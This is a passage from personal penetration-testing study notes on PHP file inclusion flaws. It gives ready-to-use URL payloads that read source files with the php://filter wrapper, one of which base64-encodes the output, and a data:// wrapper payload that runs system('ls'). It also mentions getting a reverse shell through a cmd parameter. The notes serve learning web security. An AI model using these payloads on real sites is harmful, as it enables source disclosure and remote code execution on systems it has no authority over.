r3z3l/note/Common Web Application Attacks/File Inclusion Vulnerabilities.md

 after this we can try to retrieve reverse shell by running the command by passing the reverse shell command in cmd params.

+Note: if you want to read php executable file content we can also use php wrappers like php://filter

+example reading admin.php
+`/index.php?page=php://filter/resource=admin.php` will print plain text `/index.php?page=php://filter/convert.base64-encode/resource=admin.txt` will give base64 of page content

+we can use data:// to execute
+example:
+`/page=data://text/plain,<?php%20echo%20system('ls');?>` will execute ls